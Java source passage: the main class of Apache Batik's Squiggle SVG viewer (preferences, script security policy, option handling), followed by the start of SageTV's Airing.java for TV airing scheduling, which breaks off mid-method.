java.util.Vector; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; import javax.swing.AbstractAction; import javax.swing.Action; import javax.swing.ImageIcon; import javax.swing.JOptionPane; import javax.swing.JProgressBar; import javax.swing.UIManager; import javax.swing.plaf.FontUIResource; import org.apache.batik.swing.JSVGCanvas; import org.apache.batik.swing.gvt.GVTTreeRendererAdapter; import org.apache.batik.swing.gvt.GVTTreeRendererEvent; import org.apache.batik.swing.svg.GVTTreeBuilderAdapter; import org.apache.batik.swing.svg.GVTTreeBuilderEvent; import org.apache.batik.swing.svg.SVGDocumentLoaderAdapter; import org.apache.batik.swing.svg.SVGDocumentLoaderEvent; import org.apache.batik.util.ApplicationSecurityEnforcer; import org.apache.batik.util.Platform; import org.apache.batik.util.ParsedURL; import org.apache.batik.util.SVGConstants; import org.apache.batik.util.XMLResourceDescriptor; import org.apache.batik.util.resources.ResourceManager; /** * This class contains the main method of an SVG viewer. * * @author <a href="mailto:stephane@hillion.org">Stephane Hillion</a> * @version $Id$ */ public class Main implements Application { /** * Extension used in addition to the scriptType value * to read from the PreferenceManager whether or not the * scriptType can be loaded. */ public static final String UNKNOWN_SCRIPT_TYPE_LOAD_KEY_EXTENSION = ".load"; /** * User home property */ public static final String PROPERTY_USER_HOME = "user.home"; /** * System property for specifying an additional policy file. */ public static final String PROPERTY_JAVA_SECURITY_POLICY = "java.security.policy"; /** * Batik configuration sub-directory */ public static final String BATIK_CONFIGURATION_SUBDIRECTORY = ".batik"; /** * Name of the Squiggle configuration file */ public static final String SQUIGGLE_CONFIGURATION_FILE = "preferences.xml"; /** * Name of the Squiggle policy file */ public static final String SQUIGGLE_POLICY_FILE = "__svgbrowser.policy"; /** * Entry for granting network access to scripts */ public static final String POLICY_GRANT_SCRIPT_NETWORK_ACCESS = "grant {\n permission java.net.SocketPermission \"*\", \"listen, connect, resolve, accept\";\n};\n\n"; /** * Entry for granting file system access to scripts */ public static final String POLICY_GRANT_SCRIPT_FILE_ACCESS = "grant {\n permission java.io.FilePermission \"<<ALL FILES>>\", \"read\";\n};\n\n"; /** * Entry for the list of recently visited URI */ public static final String PREFERENCE_KEY_VISITED_URI_LIST = "preference.key.visited.uri.list"; /** * Entry for the maximum number of last visited URIs */ public static final String PREFERENCE_KEY_VISITED_URI_LIST_LENGTH = "preference.key.visited.uri.list.length"; /** * List of separators between URI values in the preference * file */ public static final String URI_SEPARATOR = " "; /** * Default font-family value. */ public static final String DEFAULT_DEFAULT_FONT_FAMILY = "Arial, Helvetica, sans-serif"; /** * SVG initialization file, used to trigger loading of most of * the Batik classes */ public static final String SVG_INITIALIZATION = "resources/init.svg"; /** * Stores the initialization file URI */ protected String svgInitializationURI; /** * Creates a viewer frame and shows it.. * @param args The command-line arguments. */ public static void main(String[] args) { new Main(args); } /** * The gui resources file name */ public static final String RESOURCES = "org.apache.batik.apps.svgbrowser.resources.Main"; /** * URL for Squiggle's security policy file */ public static final String SQUIGGLE_SECURITY_POLICY = "org/apache/batik/apps/svgbrowser/resources/svgbrowser.policy"; /** * The resource bundle */ protected static ResourceBundle bundle; /** * The resource manager */ protected static ResourceManager resources; static { bundle = ResourceBundle.getBundle(RESOURCES, Locale.getDefault()); resources = new ResourceManager(bundle); } /** * The frame's icon. */ protected static ImageIcon frameIcon = new ImageIcon (Main.class.getResource(resources.getString("Frame.icon"))); /** * The preference manager. */ protected XMLPreferenceManager preferenceManager; /** * Maximum number of recently visited URIs */ public static final int MAX_VISITED_URIS = 10; /** * The array of last visited URIs */ protected Vector lastVisited = new Vector(); /** * The actual allowed maximum number of last visited URIs */ protected int maxVisitedURIs = MAX_VISITED_URIS; /** * The arguments. */ protected String[] arguments; /** * Controls whether the application can override the * system security policy property. This is done when there * was no initial security policy specified when the application * started, in which case Batik will use that property. */ protected boolean overrideSecurityPolicy = false; /** * Script security enforcement is delegated to the * security utility */ protected ApplicationSecurityEnforcer securityEnforcer; /** * The option handlers. */ protected Map handlers = new HashMap(); { handlers.put("-font-size", new FontSizeHandler()); } /** * The viewer frames. */ protected List viewerFrames = new LinkedList(); /** * The preference dialog. */ protected PreferenceDialog preferenceDialog; /** * The UI specialization to use in the JSVGViewerFrames. */ protected String uiSpecialization; /** * Creates a new application. * @param args The command-line arguments. */ public Main(String[] args) { arguments = args; if (Platform.isOSX) { uiSpecialization = "OSX"; // Move the menu bars to the top of the screen. System.setProperty("apple.laf.useScreenMenuBar", "true"); // Register listeners for the About and Preferences menu items // in the application menu (using reflection). try { Class Application = Class.forName("com.apple.eawt.Application"); Class ApplicationListener = Class.forName("com.apple.eawt.ApplicationListener"); Class ApplicationEvent = Class.forName("com.apple.eawt.ApplicationEvent"); Method getApplication = Application.getMethod("getApplication", new Class[0]); Method addApplicationListener = Application.getMethod("addApplicationListener", new Class[] { ApplicationListener }); final Method setHandled = ApplicationEvent.getMethod("setHandled", new Class[] { Boolean.TYPE }); Method setEnabledPreferencesMenu = Application.getMethod("setEnabledPreferencesMenu", new Class[] { Boolean.TYPE }); InvocationHandler listenerHandler = new InvocationHandler() { public Object invoke(Object proxy, Method method, Object[] args) { String name = method.getName(); if (name.equals("handleAbout")) { JSVGViewerFrame relativeTo = (JSVGViewerFrame) viewerFrames.get(0); AboutDialog dlg = new AboutDialog(relativeTo); // Work around pack() bug on some platforms dlg.setSize(dlg.getPreferredSize()); dlg.setLocationRelativeTo(relativeTo); dlg.setVisible(true); dlg.toFront(); } else if (name.equals("handlePreferences")) { JSVGViewerFrame relativeTo = (JSVGViewerFrame) viewerFrames.get(0); showPreferenceDialog(relativeTo); } else if (name.equals("handleQuit")) { // Do nothing, let the OS quit the app. } else { return null; } try { setHandled.invoke(args[0], new Object[] { Boolean.TRUE }); } catch (Exception e) { } return null; } }; Object application = getApplication.invoke(null, (Object[]) null); setEnabledPreferencesMenu.invoke(application, new Object[] { Boolean.TRUE }); Object listener = Proxy.newProxyInstance(Main.class.getClassLoader(), new Class[] { ApplicationListener }, listenerHandler); addApplicationListener.invoke(application, new Object[] { listener }); } catch (Exception ex) { ex.printStackTrace(); uiSpecialization = null; } } // // Preferences // Map defaults = new HashMap(11); defaults.put(PreferenceDialog.PREFERENCE_KEY_LANGUAGES, Locale.getDefault().getLanguage()); defaults.put(PreferenceDialog.PREFERENCE_KEY_SHOW_RENDERING, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_AUTO_ADJUST_WINDOW, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ENABLE_DOUBLE_BUFFERING, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_SHOW_DEBUG_TRACE, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_PROXY_HOST, ""); defaults.put(PreferenceDialog.PREFERENCE_KEY_PROXY_PORT, ""); defaults.put(PreferenceDialog.PREFERENCE_KEY_CSS_MEDIA, "screen"); defaults.put(PreferenceDialog.PREFERENCE_KEY_DEFAULT_FONT_FAMILY, DEFAULT_DEFAULT_FONT_FAMILY); defaults.put(PreferenceDialog.PREFERENCE_KEY_IS_XML_PARSER_VALIDATING, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ENFORCE_SECURE_SCRIPTING, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_FILE_ACCESS, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_NETWORK_ACCESS, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_LOAD_JAVA, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_LOAD_ECMASCRIPT, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ALLOWED_SCRIPT_ORIGIN, ResourceOrigin.DOCUMENT); defaults.put(PreferenceDialog.PREFERENCE_KEY_ALLOWED_EXTERNAL_RESOURCE_ORIGIN, ResourceOrigin.ANY); defaults.put(PREFERENCE_KEY_VISITED_URI_LIST, ""); defaults.put(PREFERENCE_KEY_VISITED_URI_LIST_LENGTH, MAX_VISITED_URIS); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_MODE, 1); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_CPU, 0.75f); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_FPS, (float) 10); defaults.put(PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET_ENABLED, Boolean.TRUE); securityEnforcer = new ApplicationSecurityEnforcer(this.getClass(), SQUIGGLE_SECURITY_POLICY); try { preferenceManager = new XMLPreferenceManager(SQUIGGLE_CONFIGURATION_FILE, defaults); String dir = System.getProperty(PROPERTY_USER_HOME); File f = new File(dir, BATIK_CONFIGURATION_SUBDIRECTORY); f.mkdir(); XMLPreferenceManager.setPreferenceDirectory(f.getCanonicalPath()); preferenceManager.load(); setPreferences(); initializeLastVisited(); Authenticator.setDefault(new JAuthenticator()); } catch (Exception e) { e.printStackTrace(); } // // Initialization // final AboutDialog initDialog = new AboutDialog(); ((BorderLayout) initDialog.getContentPane().getLayout()).setVgap(8); final JProgressBar pb = new JProgressBar(0, 3); initDialog.getContentPane().add(pb, BorderLayout.SOUTH); // Work around pack() bug on some platforms Dimension ss = initDialog.getToolkit().getScreenSize(); Dimension ds = initDialog.getPreferredSize(); initDialog.setLocation((ss.width - ds.width) / 2, (ss.height - ds.height) / 2); initDialog.setSize(ds); initDialog.setVisible(true); final JSVGViewerFrame v = new JSVGViewerFrame(this); JSVGCanvas c = v.getJSVGCanvas(); c.addSVGDocumentLoaderListener(new SVGDocumentLoaderAdapter() { public void documentLoadingStarted(SVGDocumentLoaderEvent e) { pb.setValue(1); } public void documentLoadingCompleted(SVGDocumentLoaderEvent e) { pb.setValue(2); } }); c.addGVTTreeBuilderListener(new GVTTreeBuilderAdapter() { public void gvtBuildCompleted(GVTTreeBuilderEvent e) { pb.setValue(3); } }); c.addGVTTreeRendererListener(new GVTTreeRendererAdapter() { public void gvtRenderingCompleted(GVTTreeRendererEvent e) { initDialog.dispose(); v.dispose(); System.gc(); run(); } }); c.setSize(100, 100); svgInitializationURI = Main.class.getResource(SVG_INITIALIZATION).toString(); c.loadSVGDocument(svgInitializationURI); } /** * Installs a custom policy file in the '.batik' directory. This is initialized * with the content of the policy file coming with the distribution */ public void installCustomPolicyFile() throws IOException { String securityPolicyProperty = System.getProperty(PROPERTY_JAVA_SECURITY_POLICY); if (overrideSecurityPolicy || securityPolicyProperty == null || "".equals(securityPolicyProperty)) { // Access default policy file ParsedURL policyURL = new ParsedURL(securityEnforcer.getPolicyURL()); // Override the user policy String dir = System.getProperty(PROPERTY_USER_HOME); File batikConfigDir = new File(dir, BATIK_CONFIGURATION_SUBDIRECTORY); File policyFile = new File(batikConfigDir, SQUIGGLE_POLICY_FILE); // Copy original policy file into local policy file Reader r = new BufferedReader(new InputStreamReader(policyURL.openStream())); Writer w = new FileWriter(policyFile); char[] buf = new char[1024]; int n = 0; while ( (n=r.read(buf, 0, buf.length)) != -1 ) { w.write(buf, 0, n); } r.close(); // Now, append additional grants depending on the security // settings boolean grantScriptNetworkAccess = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_NETWORK_ACCESS); boolean grantScriptFileAccess = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_FILE_ACCESS); if (grantScriptNetworkAccess) { w.write(POLICY_GRANT_SCRIPT_NETWORK_ACCESS); } if (grantScriptFileAccess) { w.write(POLICY_GRANT_SCRIPT_FILE_ACCESS); } w.close(); // We now use the JAVA_SECURITY_POLICY property, so // we allow override on subsequent calls. overrideSecurityPolicy = true; System.setProperty(PROPERTY_JAVA_SECURITY_POLICY, policyFile.toURI().toURL().toString()); } } /** * Runs the application. */ public void run() { try { int i = 0; for (; i < arguments.length; i++) { OptionHandler oh = (OptionHandler)handlers.get(arguments[i]); if (oh == null) { break; } i = oh.handleOption(i); } JSVGViewerFrame frame = createAndShowJSVGViewerFrame(); while (i < arguments.length) { if (arguments[i].length() == 0) { i++; continue; } File file = new File(arguments[i]); String uri = null; try{ if (file.canRead()) { uri = file.toURI().toURL().toString(); } }catch(SecurityException se){ // Cannot access files. } if(uri == null){ uri = arguments[i]; ParsedURL purl = null; purl = new ParsedURL(arguments[i]); if (!purl.complete()) // This is not a valid uri uri = null; } if (uri != null) { if (frame == null) frame = createAndShowJSVGViewerFrame(); frame.showSVGDocument(uri); frame = null; } else { // Let the user know that we are // skipping this file... // Note that frame may be null, which is // a valid argument for showMessageDialog // NOTE: Need to revisit Resources/Messages usage to // have a single entry point. Should have a // formated message here instead of a + ... JOptionPane.showMessageDialog (frame, resources.getString("Error.skipping.file") + arguments[i]); } i++; } } catch (Exception e) { e.printStackTrace(); printUsage(); } } /** * Prints the command line usage. */ protected void printUsage() { System.out.println(); System.out.println(resources.getString("Command.header")); System.out.println(resources.getString("Command.syntax")); System.out.println(); System.out.println(resources.getString("Command.options")); for (Object o : handlers.keySet()) { String s = (String) o; System.out.println(((OptionHandler) handlers.get(s)).getDescription()); } } /** * This interface represents an option handler. */ protected interface OptionHandler { /** * Handles the current option. * @return the index of argument just before the next one to handle. */ int handleOption(int i); /** * Returns the option description. */ String getDescription(); } /** * To handle the '-font-size' option. */ protected class FontSizeHandler implements OptionHandler { public int handleOption(int i) { int size = Integer.parseInt(arguments[++i]); Font font = new Font("Dialog", Font.PLAIN, size); FontUIResource fontRes = new FontUIResource(font); UIManager.put("CheckBox.font", fontRes); UIManager.put("PopupMenu.font", fontRes); UIManager.put("TextPane.font", fontRes); UIManager.put("MenuItem.font", fontRes); UIManager.put("ComboBox.font", fontRes); UIManager.put("Button.font", fontRes); UIManager.put("Tree.font", fontRes); UIManager.put("ScrollPane.font", fontRes); UIManager.put("TabbedPane.font", fontRes); UIManager.put("EditorPane.font", fontRes); UIManager.put("TitledBorder.font", fontRes); UIManager.put("Menu.font", fontRes); UIManager.put("TextArea.font", fontRes); UIManager.put("OptionPane.font", fontRes); UIManager.put("DesktopIcon.font", fontRes); UIManager.put("MenuBar.font", fontRes); UIManager.put("ToolBar.font", fontRes); UIManager.put("RadioButton.font", fontRes); UIManager.put("RadioButtonMenuItem.font", fontRes); UIManager.put("ToggleButton.font", fontRes); UIManager.put("ToolTip.font", fontRes); UIManager.put("ProgressBar.font", fontRes); UIManager.put("TableHeader.font", fontRes); UIManager.put("Panel.font", fontRes); UIManager.put("List.font", fontRes); UIManager.put("ColorChooser.font", fontRes); UIManager.put("PasswordField.font", fontRes); UIManager.put("TextField.font", fontRes); UIManager.put("Table.font", fontRes); UIManager.put("Label.font", fontRes); UIManager.put("InternalFrameTitlePane.font", fontRes); UIManager.put("CheckBoxMenuItem.font", fontRes); return i; } public String getDescription() { return resources.getString("Command.font-size"); } } // Application /////////////////////////////////////////////// /** * Creates and shows a new viewer frame. */ public JSVGViewerFrame createAndShowJSVGViewerFrame() { JSVGViewerFrame mainFrame = new JSVGViewerFrame(this); mainFrame.setSize(resources.getInteger("Frame.width"), resources.getInteger("Frame.height")); mainFrame.setIconImage(frameIcon.getImage()); mainFrame.setTitle(resources.getString("Frame.title")); mainFrame.setVisible(true); viewerFrames.add(mainFrame); setPreferences(mainFrame); return mainFrame; } /** * Closes the given viewer frame. */ public void closeJSVGViewerFrame(JSVGViewerFrame f) { f.getJSVGCanvas().stopProcessing(); viewerFrames.remove(f); if (viewerFrames.size() == 0) { System.exit(0); } f.dispose(); } /** * Creates a new application exit action. */ public Action createExitAction(JSVGViewerFrame vf) { return new AbstractAction() { public void actionPerformed(ActionEvent e) { System.exit(0); } }; } /** * Opens the given link in a new window. */ public void openLink(String url) { JSVGViewerFrame f = createAndShowJSVGViewerFrame(); f.getJSVGCanvas().loadSVGDocument(url); } /** * Returns the XML parser class name. */ public String getXMLParserClassName() { return XMLResourceDescriptor.getXMLParserClassName(); } /** * Returns true if the XML parser must be in validation mode, false * otherwise. */ public boolean isXMLParserValidating() { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_IS_XML_PARSER_VALIDATING); } /** * Shows the preference dialog. */ public void showPreferenceDialog(JSVGViewerFrame f) { if (preferenceDialog == null) { preferenceDialog = new PreferenceDialog(f, preferenceManager); } if (preferenceDialog.showDialog() == PreferenceDialog.OK_OPTION) { try { preferenceManager.save(); setPreferences(); } catch (Exception e) { } } } private void setPreferences() throws IOException { for (Object viewerFrame : viewerFrames) { setPreferences((JSVGViewerFrame) viewerFrame); } System.setProperty("proxyHost", preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_PROXY_HOST)); System.setProperty("proxyPort", preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_PROXY_PORT)); installCustomPolicyFile(); securityEnforcer.enforceSecurity (preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_ENFORCE_SECURE_SCRIPTING) ); } private void setPreferences(JSVGViewerFrame vf) { boolean db = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_ENABLE_DOUBLE_BUFFERING); vf.getJSVGCanvas().setDoubleBufferedRendering(db); boolean sr = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SHOW_RENDERING); vf.getJSVGCanvas().setProgressivePaint(sr); boolean d = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SHOW_DEBUG_TRACE); vf.setDebug(d); boolean aa = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_AUTO_ADJUST_WINDOW); vf.setAutoAdjust(aa); boolean dd = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE); vf.getJSVGCanvas().setSelectionOverlayXORMode(dd); int al = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_MODE); if (al < 0 || al > 2) { al = 1; } switch (al) { case 0: // none vf.getJSVGCanvas().setAnimationLimitingNone(); break; case 1: { // %cpu float pc = preferenceManager.getFloat (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_CPU); if (pc <= 0f || pc > 1.0f) { pc = 0.75f; } vf.getJSVGCanvas().setAnimationLimitingCPU(pc); break; } case 2: { // fps float fps = preferenceManager.getFloat (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_FPS); if (fps <= 0f) { fps = 10f; } vf.getJSVGCanvas().setAnimationLimitingFPS(fps); break; } } } /** * Returns the user languages. */ public String getLanguages() { String s = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_LANGUAGES); return (s == null) ? Locale.getDefault().getLanguage() : s; } /** * Returns the user stylesheet uri. * @return null if no user style sheet was specified. */ public String getUserStyleSheetURI() { boolean enabled = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET_ENABLED); String ssPath = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET); if (!enabled || ssPath.length() == 0) { return null; } try { File f = new File(ssPath); if (f.exists()) { return f.toURI().toURL().toString(); } } catch (IOException ioe) { // Nothing... } return ssPath; } /** * Returns the default value for the CSS * "font-family" property */ public String getDefaultFontFamily() { return preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_DEFAULT_FONT_FAMILY); } /** * Returns the CSS media to use. * @return empty string if no CSS media was specified. */ public String getMedia() { String s = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_CSS_MEDIA); return (s == null) ? "screen" : s; } /** * Returns true if the selection overlay is painted in XOR mode, false * otherwise. */ public boolean isSelectionOverlayXORMode() { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE); } /** * Returns true if the input scriptType can be loaded in * this application. */ public boolean canLoadScriptType(String scriptType){ if (SVGConstants.SVG_SCRIPT_TYPE_ECMASCRIPT.equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_APPLICATION_ECMASCRIPT .equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_JAVASCRIPT.equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_APPLICATION_JAVASCRIPT .equals(scriptType)) { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_LOAD_ECMASCRIPT); } else if (SVGConstants.SVG_SCRIPT_TYPE_JAVA.equals(scriptType)) { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_LOAD_JAVA); } else { return preferenceManager.getBoolean (scriptType + UNKNOWN_SCRIPT_TYPE_LOAD_KEY_EXTENSION); } } /** * Returns the allowed origins for scripts. * @see ResourceOrigin */ public int getAllowedScriptOrigin() { int ret = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ALLOWED_SCRIPT_ORIGIN); return ret; } /** * Returns the allowed origins for external * resources. * @see ResourceOrigin */ public int getAllowedExternalResourceOrigin() { int ret = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ALLOWED_EXTERNAL_RESOURCE_ORIGIN); return ret; } /** * Notifies Application of recently visited URI */ public void addVisitedURI(String uri) { if(svgInitializationURI.equals(uri)) { return; } int maxVisitedURIs = preferenceManager.getInteger (PREFERENCE_KEY_VISITED_URI_LIST_LENGTH); if (maxVisitedURIs < 0) { maxVisitedURIs = 0; } if (lastVisited.contains(uri)) { lastVisited.removeElement(uri); } while (lastVisited.size() > 0 && lastVisited.size() > (maxVisitedURIs-1)) { lastVisited.removeElementAt(0); } if (maxVisitedURIs > 0) { lastVisited.addElement(uri); } // Now, save the list of visited URL into the preferences StringBuffer lastVisitedBuffer = new StringBuffer( lastVisited.size() * 8 ); for (Object aLastVisited : lastVisited) { try { lastVisitedBuffer.append (URLEncoder.encode(aLastVisited.toString(), Charset.defaultCharset().name())); } catch (UnsupportedEncodingException e) { throw new RuntimeException(e); } lastVisitedBuffer.append(URI_SEPARATOR); } preferenceManager.setString (PREFERENCE_KEY_VISITED_URI_LIST, lastVisitedBuffer.toString()); try { preferenceManager.save(); } catch (Exception e) { // As in other places. But this is ugly... } } /** * Asks Application for a list of recently visited URI. */ public String[] getVisitedURIs() { String[] visitedURIs = new String[lastVisited.size()]; lastVisited.toArray(visitedURIs); return visitedURIs; } /** * Returns the UI resource specialization to use. */ public String getUISpecialization() { return uiSpecialization; } /** * Initializes the lastVisited array */ protected void initializeLastVisited(){ String lastVisitedStr = preferenceManager.getString(PREFERENCE_KEY_VISITED_URI_LIST); StringTokenizer st = new StringTokenizer(lastVisitedStr, URI_SEPARATOR); int n = st.countTokens(); int maxVisitedURIs = preferenceManager.getInteger (PREFERENCE_KEY_VISITED_URI_LIST_LENGTH); if (n > maxVisitedURIs) { n = maxVisitedURIs; } for (int i=0; i<n; i++) { try { lastVisited.addElement(URLDecoder.decode(st.nextToken(), Charset.defaultCharset().name())); } catch (UnsupportedEncodingException e) { throw new RuntimeException(e); } } } }
google/sagetv
35,712
java/sage/Airing.java
/* * Copyright 2015 The SageTV Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package sage; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.io.UnsupportedEncodingException; import java.util.ArrayList; import java.util.Comparator; import java.util.Date; import java.util.List; import java.util.Map; import java.util.regex.Pattern; public class Airing extends DBObject implements Schedulable { public static final long MILLIS_PER_HOUR = 60*60*1000L; public String getFullString() { StringBuilder sb = new StringBuilder(); Show myShow = getShow(); if (myShow == null) return Sage.rez("InvalidAiring"); sb.append(myShow.getTitle()); if (myShow.getEpisodeName().length() > 0) { sb.append(" - "); sb.append(myShow.getEpisodeName()); } sb.append('\n'); if (myShow.getDesc().length() > 0) { sb.append(myShow.getDesc()); sb.append('\n'); } boolean extras = false; if (myShow.categories.length > 0) { extras = true; sb.append(myShow.getCategory()); if (myShow.categories.length > 1) { sb.append('/'); sb.append(myShow.getSubCategory()); } sb.append(' '); } if (myShow.year != null) { extras = true; sb.append(myShow.getYear()); sb.append(' '); } if (myShow.rated != null) { extras = true; sb.append(myShow.getRated()); sb.append(' '); } if (myShow.pr != null) { extras = true; sb.append(myShow.getParentalRating()); sb.append(' '); } if (isFirstRun()) { extras = true; sb.append(Sage.rez("FirstRun") + " "); } String[] bon = myShow.getBonuses(); for (int i = 0; i < bon.length; i++) { extras = true; sb.append(bon[i]); sb.append(' '); } if (extras) sb.append('\n'); return sb.toString(); } public String getPartialString() { StringBuilder sb = new StringBuilder(); Show myShow = getShow(); if (myShow != null) { sb.append(myShow.getTitle()); if (myShow.getEpisodeName().length() > 0) { sb.append("-"); sb.append(myShow.getEpisodeName()); } else if (myShow.getDesc().length() > 0 && myShow.getDesc().length() < 32) { sb.append("-"); sb.append(myShow.getDesc()); } sb.append('\n'); } sb.append(Sage.rez("Airing_Duration_Channel_Time", new Object[] { Sage.durFormatHrMinPretty(duration), (getChannel() != null ? (getChannelNum(0) + ' ' + getChannel().getName()) : getChannelNum(0)), ZClock.getSpecialTimeString(new Date(time)) })); return sb.toString(); } public String getShortString() { StringBuilder sb = new StringBuilder(); if (isMusic()) { Show myShow = getShow(); if (myShow == null) return Sage.rez("Unknown"); for (int i = 0; i < myShow.people.length; i++) { if (myShow.roles[i] == Show.ARTIST_ROLE) { if (myShow.getEpisodeName().length() > 0) { sb.append(Sage.rez("Song_By_Artist", new Object[] { myShow.getEpisodeName(), myShow.people[i].name})); } else { sb.append(myShow.people[i].name); } break; } } if (sb.length() == 0) return myShow.getEpisodeName(); if (sb.length() == 0) return Sage.rez("Unknown"); } else { sb.append(Sage.rez("Airing_Title_Time_Channel", new Object[] { getTitle(), ZClock.getSpecialTimeString(new Date(time)), (getChannel() != null ? (getChannelNum(0) + ' ' + getChannel().getName()) : getChannelNum(0)), })); } return sb.toString(); } public String getChannelNum(long providerID) { EPG epg = EPG.getInstance(); long[] provIDs = (providerID == 0) ? epg.getAllProviderIDs() : new long[] { providerID }; String rv = null; for (int i = 0; i < provIDs.length; i++) { String[] nums = epg.getChannels(provIDs[i], stationID); for (int j = 0; j < nums.length; j++) { if (nums[j].length() > 0) { rv = nums[j]; EPGDataSource epgds = epg.getSourceForProviderID(provIDs[i]); if (epgds != null && epgds.canViewStationOnChannel(stationID, nums[j])) return rv; } } } return rv == null ? "" : rv; } public int getStationID() { return stationID; } public long getStartTime() { return time; } public long getDuration() { return duration; } public long getEndTime() { return time + duration; } /** * @return First Run state - defined as Live or New or within 28 days of the Original Air Date. */ public boolean isFirstRun() { Show s = getShow(); return ((miscB & (LIVE_MASK | NEW_MASK)) != 0) || (s != null && ((time - s.originalAirDate) < 28 * Sage.MILLIS_PER_DAY)); } /** * Get adjusted the starting time for this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. * * @return Adjusted starting time for this airing */ public long getSchedulingStart() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.getStartTime(); Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || bond.startPad == 0) return time; // For Favorites that are back-to-back, we don't apply any padding at that junction if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingStart(bond); } return (time - bond.startPad); } private long getAdjustedSchedulingStart(Agent bond) { Airing priorAir = Wizard.getInstance().getTimeRelativeAiring(this, -1); ManualRecord priorMR = null; if (priorAir != this && Carny.getInstance().isLoveAir(priorAir)) { if ((priorMR = Wizard.getInstance().getManualRecord(priorAir)) != null) { if (time - bond.startPad >= priorMR.getEndTime()) { return time - bond.startPad; } else { return Math.max(time - bond.startPad, Math.min(time, priorMR.getEndTime())); } } else if (!priorAir.isWatchedForSchedulingPurpose()) { Agent priorBond = Carny.getInstance().getCauseAgent(priorAir); if (priorBond != null) { // See if there's actually a conflict here that needs to be removed, don't remove padding if // we don't have to if (time - bond.startPad >= priorAir.time + priorAir.duration + priorBond.stopPad) { return time - bond.startPad; } else { return Math.max(time - bond.startPad, Math.min(time, priorAir.time + priorAir.duration + priorBond.stopPad)); } } } } return time - bond.startPad; } /** * Get adjusted the full duration of this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. * * @return Adjusted full duration time of this airing */ public long getSchedulingDuration() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.duration; Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || (bond.stopPad == 0 && bond.startPad == 0)) return duration; if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingEnd(bond) - getAdjustedSchedulingStart(bond); } return duration + bond.stopPad + bond.startPad; } /** * Get adjusted the ending time for this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. * * @return Adjusted ending time for this airing */ public long getSchedulingEnd() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.getEndTime(); Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || bond.stopPad == 0) return time + duration; else if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingEnd(bond); } return time + duration + 